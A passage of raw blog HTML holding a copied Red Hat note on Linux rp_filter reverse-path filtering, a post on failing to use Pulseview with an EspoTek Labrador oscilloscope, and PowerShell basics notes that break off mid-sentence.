rgb(237, 237, 237); box-sizing: border-box; height: 2.5rem; position: relative;"><a class="code-raw-btn" href="https://access.redhat.com/solutions/53031#" style="background: rgb(255, 255, 255); border: 0.0625rem solid rgb(204, 204, 204); box-sizing: border-box; color: #252525; font-size: 0.75rem; padding: 0.25rem 0.5rem; position: absolute; right: 0.3125rem; text-decoration-line: none; top: 0.3125rem;">Raw</a></div><pre style="background-color: whitesmoke; border-radius: 0px; border: 0.0625rem solid rgb(237, 237, 237); box-sizing: border-box; color: #333333; font-family: Consolas, Monaco, "Andale Mono", monospace; font-size: 0.8125rem; line-height: 1.42857; margin-bottom: 0.625rem; margin-top: 0px; overflow-wrap: normal; overflow: auto; padding: 0.9375rem; white-space: pre-wrap; word-break: normal;"><code style="background-color: transparent; border-radius: 0px; box-sizing: border-box; color: inherit; font-family: Consolas, Monaco, "Andale Mono", monospace; font-size: inherit; padding: 0px;">sysctl -w net.ipv4.conf.all.rp_filter=2
</code></pre></div><p style="box-sizing: border-box; line-height: 1.5em; margin: 0px 0px 1rem;">To make this change persistent across reboots, add the tunable to the <code style="background-color: whitesmoke; border-radius: 0px; box-sizing: border-box; font-family: Consolas, Monaco, "Andale Mono", monospace; font-size: 14.4px; padding: 0.125rem 0.25rem; white-space: nowrap;">/etc/sysctl.conf</code> file.</p></section><section class="field_kcs_rootcause_txt" style="background-color: white; box-sizing: border-box; color: #252525; font-family: "Red Hat Text", RedHatText, "Helvetica Neue", Arial, sans-serif; font-size: 16px; margin-bottom: 1.875rem;"><h2 style="box-sizing: border-box; color: inherit; font-family: "Red Hat Display", RedHatDisplay, "Helvetica Neue", Arial, sans-serif; font-size: 1.625rem; font-weight: 300; line-height: 1.5em; margin-bottom: 0.625rem; margin-top: 0px; text-rendering: auto;">Root Cause</h2><ul style="box-sizing: border-box; margin-bottom: 1rem; margin-top: 0px;"><li style="box-sizing: border-box;"><p style="box-sizing: border-box; line-height: 1.5em; margin: 0px 0px 1rem;">RHEL 6 and above are configured by default to apply Strict Reverse Path Forwarding filtering recommended in <a href="http://tools.ietf.org/html/rfc3704" style="background: 0px 0px transparent; box-sizing: border-box; color: #0066cc; text-decoration-line: none;">RFC 3704 - Ingress Filtering for Multihomed Networks</a>.</p></li><li style="box-sizing: border-box;"><p style="box-sizing: border-box; line-height: 1.5em; margin: 0px 0px 1rem;">Strict filtering means that when a packet arrives on the system, the kernel takes the source IP of the packet and makes a lookup of its routing table to see if the interface the packet arrived on is the same interface the kernel would use to send a packet to that IP. If the interfaces are the same then the packet has passed the strict filtering test and it is processed normally. If the interfaces are not the same then the packet is discarded without any further processing and in RHEL 7+, the <code style="background-color: whitesmoke; border-radius: 0px; box-sizing: border-box; font-family: Consolas, Monaco, "Andale Mono", monospace; font-size: 14.4px; padding: 0.125rem 0.25rem; white-space: nowrap;">IPReversePathFilter</code> counter is incremented.</p></li><li style="box-sizing: border-box;"><p style="box-sizing: border-box; line-height: 1.5em; margin: 0px 0px 1rem;">The main effect of strict filtering is that for a given remote IP, the system will only communicate with it via a specific interface. Set up static routes to control which interface responds to a given remote IP or network.</p></li><li style="box-sizing: border-box;"><p style="box-sizing: border-box; line-height: 1.5em; margin: 0px 0px 1rem;">The filtering method is controlled globally by the <code style="background-color: whitesmoke; border-radius: 0px; box-sizing: border-box; font-family: Consolas, Monaco, "Andale Mono", monospace; font-size: 14.4px; padding: 0.125rem 0.25rem; white-space: nowrap;">sysctl</code> <code style="background-color: whitesmoke; border-radius: 0px; box-sizing: border-box; font-family: Consolas, Monaco, "Andale Mono", monospace; font-size: 14.4px; padding: 0.125rem 0.25rem; white-space: nowrap;">net.ipv4.conf.all.rp_filter</code> described in the kernel documentation: <a href="https://www.kernel.org/doc/Documentation/networking/ip-sysctl.txt" style="background: 0px 0px transparent; box-sizing: border-box; color: #0066cc; text-decoration-line: none;">https://www.kernel.org/doc/Documentation/networking/ip-sysctl.txt</a>. RHEL 6+ override the kernel default value of <span style="box-sizing: border-box; font-weight: 700;">0 (disabled)</span> for this parameter and set it to <span style="box-sizing: border-box; font-weight: 700;">1 (strict)</span>.</p><div class="code-raw" style="box-sizing: border-box; position: relative;"><div class="code-raw-toolbar" style="background: rgb(237, 237, 237); border: 0.0625rem solid rgb(237, 237, 237); box-sizing: border-box; height: 2.5rem; position: relative;"><a class="code-raw-btn" href="https://access.redhat.com/solutions/53031#" style="background: rgb(255, 255, 255); border: 0.0625rem solid rgb(204, 204, 204); box-sizing: border-box; color: #252525; font-size: 0.75rem; padding: 0.25rem 0.5rem; position: absolute; right: 0.3125rem; text-decoration-line: none; top: 0.3125rem;">Raw</a></div><pre style="background-color: whitesmoke; border-radius: 0px; border: 0.0625rem solid rgb(237, 237, 237); box-sizing: border-box; color: #333333; font-family: Consolas, Monaco, "Andale Mono", monospace; font-size: 0.8125rem; line-height: 1.42857; margin-bottom: 0.625rem; margin-top: 0px; overflow-wrap: normal; overflow: auto; padding: 0.9375rem; white-space: pre-wrap; word-break: normal;"><code style="background-color: transparent; border-radius: 0px; box-sizing: border-box; color: inherit; font-family: Consolas, Monaco, "Andale Mono", monospace; font-size: inherit; padding: 0px;">rp_filter - INTEGER
0 - No source validation.
1 - Strict mode as defined in RFC3704 Strict Reverse Path
Each incoming packet is tested against the FIB and if the interface
is not the best reverse path the packet check will fail.
By default failed packets are discarded.
2 - Loose mode as defined in RFC3704 Loose Reverse Path
Each incoming packet's source address is also tested against the FIB
and if the source address is not reachable via any interface
the packet check will fail.
Current recommended practice in RFC3704 is to enable strict mode
to prevent IP spoofing from DDos attacks. If using asymmetric routing
or other complicated routing, then loose mode is recommended.
The max value from conf/{all,interface}/rp_filter is used
when doing source validation on the {interface}.
Default value is 0. Note that some distributions enable it
in startup scripts.
</code></pre></div></li><li style="box-sizing: border-box;"><p style="box-sizing: border-box; line-height: 1.5em; margin: 0px 0px 1rem;">The most simple way to disable the strict check is to set the <code style="background-color: whitesmoke; border-radius: 0px; box-sizing: border-box; font-family: Consolas, Monaco, "Andale Mono", monospace; font-size: 14.4px; padding: 0.125rem 0.25rem; white-space: nowrap;">sysctl</code> <code style="background-color: whitesmoke; border-radius: 0px; box-sizing: border-box; font-family: Consolas, Monaco, "Andale Mono", monospace; font-size: 14.4px; padding: 0.125rem 0.25rem; white-space: nowrap;">net.ipv4.conf.all.rp_filter</code> to <span style="box-sizing: border-box; font-weight: 700;">2 (loose)</span> as this will override the interface-specific settings. Setting <code style="background-color: whitesmoke; border-radius: 0px; box-sizing: border-box; font-family: Consolas, Monaco, "Andale Mono", monospace; font-size: 14.4px; padding: 0.125rem 0.25rem; white-space: nowrap;">net.ipv4.conf.all.rp_filter</code> to <span style="box-sizing: border-box; font-weight: 700;">0 (disabled)</span> does <em style="box-sizing: border-box;">not</em> override interface-specific settings so is not recommended.</p></li><li style="box-sizing: border-box;"><p style="box-sizing: border-box; line-height: 1.5em; margin: 0px 0px 1rem;">Note that without the strict check, the system may respond to a packet via a different interface than it arrived on. Whether this will result in the expected connectivity depends on many factors external to the system such as physical network topology and firewall policies.</p></li><li style="box-sizing: border-box;"><p style="box-sizing: border-box; line-height: 1.5em; margin: 0px 0px 1rem;">An alternate way to configure a system to function with <code style="background-color: whitesmoke; border-radius: 0px; box-sizing: border-box; font-family: Consolas, Monaco, "Andale Mono", monospace; font-size: 14.4px; padding: 0.125rem 0.25rem; white-space: nowrap;">rp_filter</code> in strict mode is to set up policy based routing: <a href="https://access.redhat.com/solutions/19596" style="background: 0px 0px transparent; box-sizing: border-box; color: #0066cc; text-decoration-line: none;">How can I route network traffic such that the packets go out via the same interface they came in?</a></p></li><li style="box-sizing: border-box;"><p style="box-sizing: border-box; line-height: 1.5em; margin: 0px 0px 1rem;">Note that in RHEL 5 and earlier, the kernel did not support strict filtering. So in these older releases, the <code style="background-color: whitesmoke; border-radius: 0px; box-sizing: border-box; font-family: Consolas, Monaco, "Andale Mono", monospace; font-size: 14.4px; padding: 0.125rem 0.25rem; white-space: nowrap;">net.ipv4.conf.all.rp_filter</code> parameter only has two possible values, 0 (disabled) and 1 (loose). The default is 1 (loose).</p></li></ul></section><section class="field_kcs_diagnostic_txt" style="background-color: white; box-sizing: border-box; color: #252525; font-family: "Red Hat Text", RedHatText, "Helvetica Neue", Arial, sans-serif; font-size: 16px; margin-bottom: 1.875rem;"><h2 style="box-sizing: border-box; color: inherit; font-family: "Red Hat Display", RedHatDisplay, "Helvetica Neue", Arial, sans-serif; font-size: 1.625rem; font-weight: 300; line-height: 1.5em; margin-bottom: 0.625rem; margin-top: 0px; text-rendering: auto;">Diagnostic Steps</h2><ul style="box-sizing: border-box; margin-bottom: 1rem; margin-top: 0px;"><li style="box-sizing: border-box;"><p style="box-sizing: border-box; line-height: 1.5em; margin: 0px 0px 1rem;">Check the value of the <code style="background-color: whitesmoke; border-radius: 0px; box-sizing: border-box; font-family: Consolas, Monaco, "Andale Mono", monospace; font-size: 14.4px; padding: 0.125rem 0.25rem; white-space: nowrap;">rp_filter</code> sysctls:</p><div class="code-raw" style="box-sizing: border-box; position: relative;"><div class="code-raw-toolbar" style="background: rgb(237, 237, 237); border: 0.0625rem solid rgb(237, 237, 237); box-sizing: border-box; height: 2.5rem; position: relative;"><a class="code-raw-btn" href="https://access.redhat.com/solutions/53031#" style="background: rgb(255, 255, 255); border: 0.0625rem solid rgb(204, 204, 204); box-sizing: border-box; color: #252525; font-size: 0.75rem; padding: 0.25rem 0.5rem; position: absolute; right: 0.3125rem; text-decoration-line: none; top: 0.3125rem;">Raw</a></div><pre style="background-color: whitesmoke; border-radius: 0px; border: 0.0625rem solid rgb(237, 237, 237); box-sizing: border-box; color: #333333; font-family: Consolas, Monaco, "Andale Mono", monospace; font-size: 0.8125rem; line-height: 1.42857; margin-bottom: 0.625rem; margin-top: 0px; overflow-wrap: normal; overflow: auto; padding: 0.9375rem; white-space: pre-wrap; word-break: normal;"><code style="background-color: transparent; border-radius: 0px; box-sizing: border-box; color: inherit; font-family: Consolas, Monaco, "Andale Mono", monospace; font-size: inherit; padding: 0px;">$ sysctl -a 2>/dev/null | grep "\.rp_filter"
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.default.rp_filter = 0
net.ipv4.conf.enp0s31f6.rp_filter = 0
net.ipv4.conf.lo.rp_filter = 0
net.ipv4.conf.tun0.rp_filter = 0
net.ipv4.conf.virbr0.rp_filter = 0
net.ipv4.conf.virbr0-nic.rp_filter = 0
net.ipv4.conf.virbr1.rp_filter = 0
net.ipv4.conf.virbr1-nic.rp_filter = 0
net.ipv4.conf.wlp58s0.rp_filter = 0
</code></pre></div></li><li style="box-sizing: border-box;"><p style="box-sizing: border-box; line-height: 1.5em; margin: 0px 0px 1rem;">For RHEL 7 and above, check the <code style="background-color: whitesmoke; border-radius: 0px; box-sizing: border-box; font-family: Consolas, Monaco, "Andale Mono", monospace; font-size: 14.4px; padding: 0.125rem 0.25rem; white-space: nowrap;">IPReversePathFilter</code> SNMP counter. If packets are being ignored due to strict filtering then this counter will increment each time it happens:</p><div class="code-raw" style="box-sizing: border-box; position: relative;"><pre style="background-color: whitesmoke; border-radius: 0px; border: 0.0625rem solid rgb(237, 237, 237); box-sizing: border-box; color: #333333; font-family: Consolas, Monaco, "Andale Mono", monospace; font-size: 0.8125rem; line-height: 1.42857; margin-bottom: 0.625rem; margin-top: 0px; overflow-wrap: normal; overflow: auto; padding: 0.9375rem; white-space: pre-wrap; word-break: normal;"><code style="background-color: transparent; border-radius: 0px; box-sizing: border-box; color: inherit; font-family: Consolas, Monaco, "Andale Mono", monospace; font-size: inherit; padding: 0px;">$ nstat -rsz | grep IPReversePathFilter
TcpExtIPReversePathFilter 52537 0.0
$ netstat -s | grep IPReversePathFilter
IPReversePathFilter: 52537
</code></pre></div></li><li style="box-sizing: border-box;"><p style="box-sizing: border-box; line-height: 1.5em; margin: 0px 0px 1rem;">For a given remote IP whose packets appear to be ignored by the system, perform a route lookup to see which interface the system will use to reach that remote IP. If this is not the same interface the remote IP's packets are arriving on then strict enforcing will discard them:</p><div class="code-raw" style="box-sizing: border-box; position: relative;"><pre style="background-color: whitesmoke; border-radius: 0px; border: 0.0625rem solid rgb(237, 237, 237); box-sizing: border-box; color: #333333; font-family: Consolas, Monaco, "Andale Mono", monospace; font-size: 0.8125rem; line-height: 1.42857; margin-bottom: 0.625rem; margin-top: 0px; overflow-wrap: normal; overflow: auto; padding: 0.9375rem; white-space: pre-wrap; word-break: normal;"><code style="background-color: transparent; border-radius: 0px; box-sizing: border-box; color: inherit; font-family: Consolas, Monaco, "Andale Mono", monospace; font-size: inherit; padding: 0px;">$ ip route get <remote IP></code></pre></div></li></ul></section>WrightRockethttp://www.blogger.com/profile/04897154139709428821noreply@blogger.com0tag:blogger.com,1999:blog-9173305322166784343.post-681546925807457922021-10-21T18:53:00.001-07:002021-10-21T18:53:54.181-07:00EspoTek Labrador Oscilloscope: Day Three<h3 style="text-align: left;"> Pulseview</h3><div>Summary: Pulseview doesn't work with the Labrador, and I wasted my time trying.</div><div><br /></div><div>Just as the Labrador Oscilloscope from EspoTek can be used with other devices and on multiple platforms, the Pulseview Logic Analyzer from Sigrok can too. On this day, I'm going to explore how to use Pulseview, one of the many frontends to libsigrok which has multiple GUIs and even a Command Line Interface! </div><div><br /></div><div>The sigrok.org website has downloads available for multiple platforms and in multiple formats. You can download an AppImage, the source code, and installation packages for various platforms. The AppImage that was available was missing the "_ctypes" module when I tried to use it, so I tried cross-compiling the packages. When I tried to follow the README for that, it choked when I ran the script that was supposed to do it all. So, I had one last option to get Pulseview to work without having to fix something. </div><div><br /></div><div>For Linux, they did have Deb and Rpm formats. This inspired me to run "dnf search sigrok" and I found that my Linux distribution appeared to have all the RPM packages I needed. Using the Fedora distribution, I was able to install the necessary packages with the following "dnf install ..." command:</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-zqRSuMaiEOU/YLVJh1y9o5I/AAAAAAABhmQ/pdZb6BNEMzAr78B39ZGxo1eP-YHuohBAACLcBGAsYHQ/s1600/Screenshot%2Bfrom%2B2021-05-30%2B22-01-22.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="873" data-original-width="1600" height="268" src="https://1.bp.blogspot.com/-zqRSuMaiEOU/YLVJh1y9o5I/AAAAAAABhmQ/pdZb6BNEMzAr78B39ZGxo1eP-YHuohBAACLcBGAsYHQ/w491-h268/Screenshot%2Bfrom%2B2021-05-30%2B22-01-22.png" width="491" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;">Once these packages were installed, I was able to run "pulseview". Although the device did show up, it didn't have the correct permissions to run as an ordinary user. It did work using "sudo pulseview", but I'd rather not do that. </div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">I know that the correct way to set permissions and ownerships for device files is to use ".rules" files in the /etc/udev/rules.d directory. At sigrok.org, in the Linux instructions, I saw a link for udev rules: <a href="https://sigrok.org/gitweb/?p=libsigrok.git;a=tree;f=contrib">https://sigrok.org/gitweb/?p=libsigrok.git;a=tree;f=contrib</a></div><div class="separator" style="clear: both; text-align: left;"> When clicking the link, there seems to be a redirect that I haven't figured out how to avoid.</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">Even once I added the proper permissions, I determined I wasted my time. Pulseview doesn't work with the current Labrador. 😞 Sorry!</div><br /><div><br /></div>WrightRockethttp://www.blogger.com/profile/04897154139709428821noreply@blogger.com0tag:blogger.com,1999:blog-9173305322166784343.post-19716368787086669022021-06-14T22:01:00.001-07:002023-10-09T00:36:24.566-07:00Powershell in a Nutshell<h2 style="text-align: left;">The Power of Powershell </h2><div>What makes Powershell so powerful is that its executables accept objects as input and produce objects as output. All input and output is handled by Powershell in a standard way with pipelines like <b>Get-Command | Out-Host -Paging</b>. Filtering is also builtin with <b>Group-Object</b>, <b>Select-Object </b>and<b> Where-Object</b>.</div><div><br /></div><div>The command syntax is standardized as <b>Verb-Noun -?</b>. Commands can be discovered with <b>Get-Command</b>.</div><div><br /></div><div>Aliases can be created for simplifications like <b>cls</b> for <b>Clear-Host</b>.</div><div><br /></div><div>Help is easy with <b>-?</b> as an option and <b>Get-Help </b>documentation available online or to download with <b>Update-Help</b>.</div><div><br /></div><div>Objects can be inspected with <b>Get-Member -InputObject Get-Location </b>or<b> Get-Location | Get-Member</b>. The members of an object include the object's methods and properties.</div><div><br /></div><div>Variables can be used with a $ prefix to the name, the sigil is used in both referring to the variable and assigning it a value. In loops, <code style="border-radius: 3px; box-sizing: inherit; color: #171717; direction: ltr; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; outline-color: inherit; overflow-wrap: break-word; padding: 0.1em 0.2em;">$_</code><span face=""Segoe UI", SegoeUI, "Helvetica Neue", Helvetica, Arial, sans-serif" style="background-color: white; color: #171717; font-size: 16px;"> is the current object. </span><code style="border-radius: 3px; box-sizing: inherit; color: #171717; direction: ltr; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; outline-color: inherit; overflow-wrap: break-word; padding: 0.1em 0.2em;">$PSItem</code><span face=""Segoe UI", SegoeUI, "Helvetica Neue", Helvetica, Arial, sans-serif" style="background-color: white; color: #171717; font-size: 16px;"> can be used instead of </span><code style="border-radius: 3px; box-sizing: inherit; color: #171717; direction: ltr; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; outline-color: inherit; overflow-wrap: break-word; padding: 0.1em 0.2em;">$_</code><code style="background-color: white; border-radius: 3px; box-sizing: inherit; color: #171717; direction: ltr; font-size: 16px; outline-color: inherit; overflow-wrap: break-word; padding: 0.1em 0.2em;"><span face="Segoe UI, SegoeUI, Helvetica Neue, Helvetica, Arial, sans-serif"> in recent versions.</span></code></div><h3 style="text-align: left;">Powershell Components</h3><h4 style="text-align: left;">Modules</h4><div>Groups of Objects related to an area of interest like Hosts, Security, Devices, Services, etc.</div><div><br /></div><div>Ex.: https://www.powershellgallery.com/ </div><div><br /></div><div><b><span style="font-family: courier;">Install-Module -Name PowerShellGet -AllowPrerelease -Force</span></b></div><div><br /></div><h4 style="text-align: left;">CmdLets</h4><h4 style="text-align: left;">Scripts</h4><div><h4 style="text-align: left;">DSC Resource</h4><div><span face=""Segoe UI", SegoeUI, "Helvetica Neue", Helvetica, Arial, sans-serif" style="background-color: white; color: #171717; font-size: 16px;">DSC configurations separate intent, or "what I want to do", from execution, or "how I want to do it."</span></div><div><span style="background-color: white;"><span face="Segoe UI, SegoeUI, Helvetica Neue, Helvetica, Arial, sans-serif" style="color: #171717;"><br /></span></span></div><div><span style="background-color: white;"><span face="Segoe UI, SegoeUI, Helvetica Neue, Helvetica, Arial, sans-serif" style="color: #171717;">https://github.com/Microsoft/omi</span></span></div><div><span style="background-color: white;"><span face="Segoe UI, SegoeUI, Helvetica Neue, Helvetica, Arial, sans-serif" style="color: #171717;">https://github.com/microsoft/PowerShell-DSC-for-Linux</span></span></div><div><span style="background-color: white;"><span face="Segoe UI, SegoeUI, Helvetica Neue, Helvetica, Arial, sans-serif" style="color: #171717;"><br /></span></span></div><h4 style="text-align: left;">Function</h4><h4 style="text-align: left;">Role Capability</h4><h4 style="text-align: left;">Workflow</h4></div><div><br /></div><h2 style="text-align: left;">Basic Powershell Prefixes</h2><br />Get — To retrieve something<br />Start — To begin a process <br />Out — To output something<br />Stop — To end a process <br />Set — To define an identifier <br />New — To create an object<div><br /></div><h3 style="text-align: left;">Examples:</h3><div><br /></div><div><span style="font-family: courier;"><b>Get-Date -Date "2021-02-14"</b></span></div><div><span style="font-family: courier;"><b><br /></b></span></div><div><span style="font-family: courier;"><b>Get-Date | Get-Member</b></span></div><div><span style="font-family: courier;"><b><br /></b></span></div><div><span style="font-family: courier;"><b>Update-Help <br /></b></span><div><span style="font-family: courier;"><b><br /></b></span></div><div><span style="font-family: courier;"><b>Get-Help Get-Date</b></span></div><div><span style="font-family: courier;"><b><br /></b></span></div><div><span style="font-family: courier;"><b>Get-Process</b></span></div><div><br /></div><h2 style="text-align: left;">Optional Features</h2><div><br /></div><div>Get-WindowsOptionalFeature -Online</div><div><br /></div><div><br /></div><h3 style="text-align: left;">PowerShell Modules</h3><div><br /></div><div>Snap-ins installed by default</div><div><div>- CimCmdlets</div><div>- Microsoft.PowerShell.Archive</div><div>- Microsoft.PowerShell.Core</div><div>- Microsoft.PowerShell.Diagnostics</div><div>- Microsoft.PowerShell.Host</div><div>- Microsoft.PowerShell.Management</div><div>- Microsoft.PowerShell.ODataUtils</div><div>- Microsoft.PowerShell.Security</div><div>- Microsoft.PowerShell.Utility</div><div>- Microsoft.WSMan.Management</div><div>- PackageManagement</div><div>- PowerShellGet</div><div>- PSDesiredStateConfiguration</div><div>- PSDiagnostics</div><div>- PSScheduledJob</div><div>- PSWorkflow</div><div>- PSWorkflowUtility</div><div>- ISE</div></div><div><br /></div><h3 style="text-align: left;">Finding Commands, Aliases and Functions</h3><div>All Alias, Functions, and Cmdlets will be listed when using the command:</div><div><div><span style="font-family: courier;"><b><br /></b></span></div><div><span style="font-family: courier;"><span><b>Get-Command</b></span> </span></div><div><br /></div><div>In addition, all applications included in the path will be listed when using the command:</div><div><br /></div><div><span style="font-family: courier;"><span><b>Get-Command</b></span> *</span></div><div><br /></div><div>To list what is contained in a module like Microsoft.Powershell.Utility use:</div><div><br /></div><div><span style="font-family: courier;"><b>Get-Command -FullyQualifiedModule Microsoft.Powershell.Utility</b></span></div><div><br /></div><div><span style="font-family: courier;"><b>Get-Help</b></span></div><div><br /></div><div><b><span style="font-family: courier;">Get-Module</span></b></div><div><br /></div><div><span style="font-family: courier;"><b>Import-Module</b></span></div><div><br /></div><div><span style="font-family: courier;"><b>Remove-Module</b></span></div></div><div><br /></div><h3 style="text-align: left;">Access Object Properties and Methods</h3><div>As an example, look at the Properties and Methods of <b>Get-Location</b> cmdlet object with <b>Get-Member</b>. You can enclose the object with parentheses "()" and then use the dot "." between the right parenthesis and the property name or method name. Methods are followed by their own parentheses which may contain other objects<b>:</b></div></div><div><br /></div><div><div><b><span style="font-family: courier;">PS /home/keith> Get-Location | Get-Member </span></b></div><div><b><span style="font-family: courier;"><br /></span></b></div><div><span style="font-family: courier;">TypeName: System.Management.Automation.PathInfo</span></div><div><span style="font-family: courier;"><br /></span></div><div><span style="font-family: courier;">Name MemberType Definition</span></div><div><span style="font-family: courier;">---- ---------- ----------</span></div><div><span style="font-family: courier;">Equals Method bool Equals(System.Object obj)</span></div><div><span style="font-family: courier;">GetHashCode Method int GetHashCode()</span></div><div><span style="font-family: courier;">GetType Method type GetType()</span></div><div><span style="font-family: courier;">ToString Method string ToString()</span></div><div><span style="font-family: courier;">Drive Property System.Management.Automation.PSDriveInfo Drive {get;}</span></div><div><span style="font-family: courier;">Path Property string Path {get;}</span></div><div><span style="font-family: courier;">Provider Property System.Management.Automation.ProviderInfo Provider {ge…</span></div><div><span style="font-family: courier;">ProviderPath Property string ProviderPath {get;}</span></div><div><span style="font-family: courier;"><br /></span></div><div><span style="font-family: courier;">PS /home/keith> <b>(Get-Location).Path </b> </span></div><div><span style="font-family: courier;">/home/keith</span></div><div><span style="font-family: courier;">PS /home/keith> <b>(Get-Location).Drive</b></span></div><div><span style="font-family: courier;"><br /></span></div><div><span style="font-family: courier;">Name Used (GB) Free (GB) Provider Root</span></div><div><span style="font-family: courier;">---- --------- --------- -------- ---- </span></div><div><span style="font-family: courier;">/ 44.55 23.86 FileSystem / </span></div><div><span style="font-family: courier;"><br /></span></div><div><span style="font-family: courier;">PS /home/keith> <b>(Get-Location).GetType()</b></span></div><div><span style="font-family: courier;"><br /></span></div><div><span style="font-family: courier;">IsPublic IsSerial Name BaseType</span></div><div><span style="font-family: courier;">-------- -------- ---- --------</span></div><div><span style="font-family: courier;">True False PathInfo System.Object</span></div><div><span style="font-family: courier;"><br /></span></div><br /><h3 style="text-align: left;">Select Attributes</h3><br /><b><span style="font-family: courier;"><br />get-ucsblade | select Serial, Slotid, Model, Chassisid, DN | FT</span></b><br /><div style="font-weight: bold;"><br /></div></div><h3 style="text-align: left;">Where-Object Filtering</h3><div>When you want to filter the objects listed for a certain attribute value, Where-Object is a useful tool. Instead of seeing all the Windows Optional features, the following only lists those with a State attribute that is equal to 'Enabled':</div><div><span style="font-family: courier;"><b><br /></b></span></div><div><span style="font-family: courier;"><b>Get-WindowsOptionalFeature -Online | Where-Object State -eq 'Enabled'</b></span></div><div><span style="font-family: courier;"><b><br /></b></span></div><div><span style="font-family: courier;"><b><br /></b></span></div><div><h3 style="text-align: left;">Managing environment variables</h3><div><br /></div><div>PowerShell provides several different methods for managing environment</div><div>variables.</div><div><br /></div><div>- The Environment provider drive</div><div>- The Item cmdlets</div><div>- The .NET SYSTEM.ENVIRONMENT class</div><div>- On Windows, the System Control Panel</div><div><br /></div><div>Using the Environment provider</div><div><br /></div><div>Each environment variable is represented by an instance of the</div><div>SYSTEM.COLLECTIONS.DICTIONARYENTRY class. In each DICTIONARYENTRY object,</div><div>the name of the environment variable is the dictionary key. The value of</div><div>the variable is the dictionary value.</div><div><br /></div><div>To display the properties and methods of the object that represents an</div><div>environment variable in PowerShell, use the Get-Member cmdlet. For example,</div><div>to display the methods and properties of all the objects in the Env: drive,</div><div>type:</div><div><br /></div><div> Get-Item -Path Env:* | Get-Member</div><div><br /></div><div>The PowerShell Environment provider lets you access environment variables</div><div>in a PowerShell drive (the Env: drive). This drive looks much like a file</div><div>system drive. To go to the Env: drive, type:</div><div><br /></div><div> Set-Location Env:</div><div><br /></div><div>Use the Content cmdlets to get or set the values of an environment</div><div>variable.</div><div><br /></div><div> PS Env:\> Set-Content -Path Test -Value 'Test value'</div><div> PS Env:\> Get-Content -Path Test</div><div> Test value</div><div><br /></div><div>You can view the environment variables in the Env: drive from any other</div><div>PowerShell drive, and you can go into the Env: drive to view and change the</div><div>environment variables.</div><div><br /></div><div>Using Item cmdlets</div><div><br /></div><div>When you refer to an environment variable, type the Env: drive name</div><div>followed by the name of the variable. For example, to display the value of</div><div>the COMPUTERNAME environment variable, type:</div><div><br /></div><div> Get-ChildItem Env:Computername</div><div><br /></div><div>To display the values of all the environment variables, type:</div><div><br /></div><div> Get-ChildItem Env:</div><div><br /></div><div>Because environment variables do not have child items, the output of</div><div>Get-Item and Get-ChildItem is the same.</div><div><br /></div><div>By default, PowerShell displays the environment variables in the order in</div><div>which it retrieves them. To sort the list of environment variables by</div><div>variable name, pipe the output of a Get-ChildItem command to the</div><div>Sort-Object cmdlet. For example, from any PowerShell drive, type:</div><div><br /></div><div> Get-ChildItem Env: | Sort Name</div><div><br /></div><div>You can also go into the Env: drive by using the Set-Location cmdlet:</div><div><br /></div><div> Set-Location Env:</div><div><br /></div><div>When you are in the Env: drive, you can omit the Env: drive name from the</div><div>path. For example, to display all the environment variables, type:</div><div><br /></div><div> PS Env:\> Get-ChildItem</div><div><br /></div><div>To display the value of the COMPUTERNAME variable from within the Env:</div><div>drive, type:</div><div><br /></div><div> PS Env:\> Get-ChildItem ComputerName</div><div><br /></div><div>Saving changes to environment variables</div><div><br /></div><div>To make a persistent change to an environment variable on Windows, use the</div><div>System Control Panel. Select ADVANCED SYSTEM SETTINGS. On the ADVANCED tab,</div><div>click ENVIRONMENT VARIABLE.... You can add or edit existing environment</div><div>variables in the USER and SYSTEM (Machine) scopes. Windows writes these</div><div>values to the Registry so that they persist across sessions and system</div><div>restarts.</div><div><br /></div><div>Alternately, you can add or change environment variables in your PowerShell</div><div>profile. This method works for any version of PowerShell on any supported</div><div>platform.</div><div><br /></div><div>Using System.Environment methods</div><div><br /></div><div>The SYSTEM.ENVIRONMENT class provides GETENVIRONMENTVARIABLE and</div><div>SETENVIRONMENTVARIABLE methods that allow you to specify the scope of the</div><div>variable.</div><div><br /></div><div>The following example uses the GETENVIRONMENTVARIABLE method to get the</div><div>machine setting of PSModulePath and the SETENVIRONMENTVARIABLE method to</div><a aria-expanded="false" aria-label="Google apps" class="gb_d" href="https://www.google.com/intl/en/about/products?tab=jh" role="button" tabindex="0"><svg class="gb_i" focusable="false" viewbox="0 0 24 24"><path d="M6,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,20c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM6,20c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM6,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2z"></path></svg></a><div><br /></div><div>add the C:\Program Files\Fabrikam\Modules path to the value.</div><div><br /></div><div> $path = [Environment]::GetEnvironmentVariable('PSModulePath', 'Machine')</div><div> $newpath = $path + ';C:\Program Files\Fabrikam\Modules'</div><div> [Environment]::SetEnvironmentVariable("PSModulePath", $newpath, 'Machine')</div><div><br /></div><div>For more information about the methods of the 